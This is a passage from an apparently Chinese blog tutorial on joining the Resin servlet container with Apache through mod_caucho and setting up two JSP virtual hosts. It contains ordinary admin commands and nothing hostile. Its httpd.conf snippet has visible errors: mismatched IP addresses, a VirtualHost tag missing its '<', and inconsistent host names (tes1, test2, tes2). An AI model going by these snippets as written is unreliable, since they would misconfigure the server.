# mv resin-3.0.10 /usr/java/
# cd /usr/java/
# ln -s resin-3.0.10/ resin
启动resin
# /usr/java/resin/bin/httpd.sh start
现在就能够从http://localhost:8080/上能看到resin的页面,这也就表示单独的resin运行成功了。然后,为了整合resin和apache,我们需要重新编译一下,以生成mod_caucho给apache调用。
# cd /usr/java/resin
  # ./configure --with-apache=/usr/java/httpd2  
  # make
  # make install
修改/usr/java/resin/conf/resin.conf,大约在最后(安装的resin版本不同,配置文件的内容可能有所不同),将<document-directory>修改成自己的apache的documentroot的值。

      
  <document-directory>/usr/java/httpd2/htdocs</document-directory> ##这里修改成/usr/java/httpd2/htdocs

最后vi /usr/java/httpd2/conf/httpd.conf
复制以下内容
<location /caucho-status>
   sethandler caucho-status
  </location>

保存后。从启APACHE和RESIN
# /usr/java/resin/bin/httpd.sh restart
# /usr/java/httpd2/bin/apachectl restart

通过浏览器去访问http://localhost/caucho-status/,如果出现以下页面刚表示resin和apache已经成功整合了。
http://www.dfmqp.cn/caucho-status/
七.建立resin和apache的虚拟主机 我们建立的是tes1.jsp.com test2.jsp.com 两个虚拟主机

vi /usr/java/httpd2/conf/httpd.conf
复制如下内容到httpd.conf里
NameVirtualHost 192.168.0.1  虚拟主机建立所在的IP
<VirtualHost 199.199.0.1>
    DocumentRoot /home/jsp1/  文件所在目录
    ServerName tes1.jsp.com  访问的域名
</VirtualHost>
VirtualHost 192.168.0.1>
    DocumentRoot /home/jsp2/
    ServerName test2.jsp.com
</VirtualHost>
vi /usr/java/resin/conf/resin.conf
查找如下代码并修改:

    <host id="" root-directory=".">
      <!--
         - configures an explicit root web-app matching the
         - webapp's ROOT
        -->
      <web-app id='/' document-directory="/usr/java/httpd2/htdocs"/>
    </host>
<host id='tes1.jsp.com'>
<web-app id='/' document-directory="/home/jsp1"/>
</host>
<host id='tes2.jsp.com'>
<web-app id='/' document-directory="/home/jsp2"/>
</host>
保存从启apache和resin
tes1.jsp.com  和tes2.jsp.com 虚拟主机可以运行了


可以做如下测试http://localhost/caucho-status/
可以看到测试面上有
Virtual Host: tes1.jsp.com:80
Virtual Host: tes2.jsp.com:80
证明JSP虚拟主机工作很正常
Tags: , , , , ,
分页: 15/28 第一页 上页 10 11 12 13 14 15 16 17 18 19 下页 最后页 [ 显示模式: 摘要 | 列表 ]